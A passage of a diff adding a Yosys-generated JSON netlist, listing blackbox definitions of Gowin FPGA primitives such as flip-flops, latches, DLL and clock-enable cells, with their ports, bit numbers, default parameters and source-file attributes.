+ } + }, + "RESET": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:427.43-427.48" + } + } + } + }, + "DFFNRE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_flop": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:446.1-463.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + }, + "RESET": { + "direction": "input", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:446.44-446.46" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:446.39-446.42" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:446.36-446.37" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:446.27-446.28" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:446.48-446.53" + } + } + } + }, + "DFFNS": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_flop": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:388.1-404.10" + }, + "parameter_default_values": { + "INIT": "1" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "SET": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:388.38-388.41" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:388.35-388.36" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:388.26-388.27" + } + }, + "SET": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:388.43-388.46" + } + } + } + }, + "DFFNSE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_flop": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:407.1-424.10" + }, + "parameter_default_values": { + "INIT": "1" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + }, + "SET": { + "direction": "input", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:407.44-407.46" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:407.39-407.42" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:407.36-407.37" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:407.27-407.28" + } + }, + "SET": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:407.48-407.51" + } + } + } + }, + "DFFP": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:279.1-295.10" + }, + "parameter_default_values": { + "INIT": "1" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "PRESET": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:279.37-279.40" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:279.34-279.35" + } + }, + "PRESET": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:279.42-279.48" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:279.25-279.26" + } + } + } + }, + "DFFPE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:298.1-315.10" + }, + "parameter_default_values": { + "INIT": "1" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + }, + "PRESET": { + "direction": "input", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:298.43-298.45" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:298.38-298.41" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:298.35-298.36" + } + }, + "PRESET": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:298.47-298.53" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:298.26-298.27" + } + } + } + }, + "DFFR": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "abc9_flop": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:240.1-256.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "RESET": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:240.37-240.40" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:240.34-240.35" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:240.25-240.26" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:240.42-240.47" + } + } + } + }, + "DFFRE": { + "attributes": { + "abc9_flop": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:259.1-276.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + }, + "RESET": { + "direction": "input", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:259.43-259.45" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:259.38-259.41" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:259.35-259.36" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "0", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:259.26-259.27" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:259.47-259.52" + } + } + } + }, + "DFFS": { + "attributes": { + "abc9_flop": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:201.1-217.10" + }, + "parameter_default_values": { + "INIT": "1" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "SET": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:201.37-201.40" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:201.34-201.35" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:201.25-201.26" + } + }, + "SET": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:201.42-201.45" + } + } + } + }, + "DFFSE": { + "attributes": { + "abc9_flop": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:220.1-237.10" + }, + "parameter_default_values": { + "INIT": "1" + }, + "ports": { + "Q": { + "direction": "output", + "bits": [ 2 ] + }, + "D": { + "direction": "input", + "bits": [ 3 ] + }, + "CLK": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + }, + "SET": { + "direction": "input", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:220.43-220.45" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:220.38-220.41" + } + }, + "D": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:220.35-220.36" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "init": "1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:220.26-220.27" + } + }, + "SET": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:220.47-220.50" + } + } + } + }, + "DHCEN": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1483.1-1486.10" + }, + "ports": { + "CLKIN": { + "direction": "input", + "bits": [ 2 ] + }, + "CE": { + "direction": "input", + "bits": [ 3 ] + }, + "CLKOUT": { + "direction": "output", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1484.13-1484.15" + } + }, + "CLKIN": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1484.7-1484.12" + } + }, + "CLKOUT": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1485.8-1485.14" + } + } + } + }, + "DHCENC": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1697.1-1700.10" + }, + "ports": { + "CLKIN": { + "direction": "input", + "bits": [ 2 ] + }, + "CE": { + "direction": "input", + "bits": [ 3 ] + }, + "CLKOUT": { + "direction": "output", + "bits": [ 4 ] + }, + "CLKOUTN": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1698.14-1698.16" + } + }, + "CLKIN": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1698.7-1698.12" + } + }, + "CLKOUT": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1699.8-1699.14" + } + }, + "CLKOUTN": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1699.16-1699.23" + } + } + } + }, + "DL": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:79.1-83.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "G": { + "direction": "input", + "bits": [ 3 ] + }, + "Q": { + "direction": "output", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:80.7-80.8" + } + }, + "G": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:80.10-80.11" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:81.8-81.9" + } + } + } + }, + "DLC": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:93.1-97.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "G": { + "direction": "input", + "bits": [ 3 ] + }, + "CLEAR": { + "direction": "input", + "bits": [ 4 ] + }, + "Q": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CLEAR": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:94.13-94.18" + } + }, + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:94.7-94.8" + } + }, + "G": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:94.10-94.11" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:95.8-95.9" + } + } + } + }, + "DLCE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:100.1-104.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "G": { + "direction": "input", + "bits": [ 3 ] + }, + "CLEAR": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + }, + "Q": { + "direction": "output", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:101.20-101.22" + } + }, + "CLEAR": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:101.13-101.18" + } + }, + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:101.7-101.8" + } + }, + "G": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:101.10-101.11" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:102.8-102.9" + } + } + } + }, + "DLE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:86.1-90.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "G": { + "direction": "input", + "bits": [ 3 ] + }, + "CE": { + "direction": "input", + "bits": [ 4 ] + }, + "Q": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:87.13-87.15" + } + }, + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:87.7-87.8" + } + }, + "G": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:87.10-87.11" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:88.8-88.9" + } + } + } + }, + "DLL": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1488.1-1499.10" + }, + "parameter_default_values": { + "CODESCAL": "000 ", + "DIV_SEL": "0", + "DLL_FORCE": "00000000000000000000000000000000", + "SCAL_EN": "true" + }, + "ports": { + "CLKIN": { + "direction": "input", + "bits": [ 2 ] + }, + "STOP": { + "direction": "input", + "bits": [ 3 ] + }, + "UPDNCNTL": { + "direction": "input", + "bits": [ 4 ] + }, + "RESET": { + "direction": "input", + "bits": [ 5 ] + }, + "STEP": { + "direction": "output", + "bits": [ 6, 7, 8, 9, 10, 11, 12, 13 ] + }, + "LOCK": { + "direction": "output", + "bits": [ 14 ] + } + }, + "cells": { + }, + "netnames": { + "CLKIN": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1489.7-1489.12" + } + }, + "LOCK": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1494.8-1494.12" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1492.7-1492.12" + } + }, + "STEP": { + "hide_name": 0, + "bits": [ 6, 7, 8, 9, 10, 11, 12, 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1493.13-1493.17" + } + }, + "STOP": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1490.7-1490.11" + } + }, + "UPDNCNTL": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1491.7-1491.15" + } + } + } + }, + "DLLDLY": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1501.1-1510.10" + }, + "parameter_default_values": { + "DLL_INSEL": "1", + "DLY_ADJ": "00000000000000000000000000000000", + "DLY_SIGN": "0" + }, + "ports": { + "CLKIN": { + "direction": "input", + "bits": [ 2 ] + }, + "DLLSTEP": { + "direction": "input", + "bits": [ 3, 4, 5, 6, 7, 8, 9, 10 ] + }, + "DIR": { + "direction": "input", + "bits": [ 11 ] + }, + "LOADN": { + "direction": "input", + "bits": [ 12 ] + }, + "MOVE": { + "direction": "input", + "bits": [ 13 ] + }, + "CLKOUT": { + "direction": "output", + "bits": [ 14 ] + }, + "FLAG": { + "direction": "output", + "bits": [ 15 ] + } + }, + "cells": { + }, + "netnames": { + "CLKIN": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1502.7-1502.12" + } + }, + "CLKOUT": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1505.8-1505.14" + } + }, + "DIR": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1504.7-1504.10" + } + }, + "DLLSTEP": { + "hide_name": 0, + "bits": [ 3, 4, 5, 6, 7, 8, 9, 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1503.13-1503.20" + } + }, + "FLAG": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1506.8-1506.12" + } + }, + "LOADN": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1504.11-1504.16" + } + }, + "MOVE": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1504.17-1504.21" + } + } + } + }, + "DLN": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:121.1-125.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "G": { + "direction": "input", + "bits": [ 3 ] + }, + "Q": { + "direction": "output", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:122.7-122.8" + } + }, + "G": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:122.10-122.11" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:123.8-123.9" + } + } + } + }, + "DLNC": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:135.1-139.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "G": { + "direction": "input", + "bits": [ 3 ] + }, + "CLEAR": { + "direction": "input", + "bits": [ 4 ] + }, + "Q": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CLEAR": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:136.13-136.18" + } + }, + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:136.7-136.8" + } + }, + "G": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:136.10-136.11" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:137.8-137.9" + } + } + } + }, + "DLNCE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:142.1-146.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "G": { + "direction": "input", + "bits": [ 3 ] + }, + "CLEAR": { + "direction": "input", + "bits": [ 4 ] + }, + "CE": { + "direction": "input", + "bits": [ 5 ] + }, + "Q": { + "direction": "output", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:143.20-143.22" + } + }, + "CLEAR": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:143.13-143.18" + } + }, + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:143.7-143.8" + } + }, + "G": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:143.10-143.11" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:144.8-144.9" + } + } + } + }, + "DLNE": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:128.1-132.10" + }, + "parameter_default_values": { + "INIT": "0" + }, + "ports": { + "D": { + "direction": "input", + "bits": [ 2 ] + }, + "G": { + "direction": "input", + "bits": [ 3 ] + }, + "CE": { + "direction": "input", + "bits": [ 4 ] + }, + "Q": { + "direction": "output", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "CE": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:129.13-129.15" + } + }, + "D": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:129.7-129.8" + } + }, + "G": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:129.10-129.11" + } + }, + "Q": { + 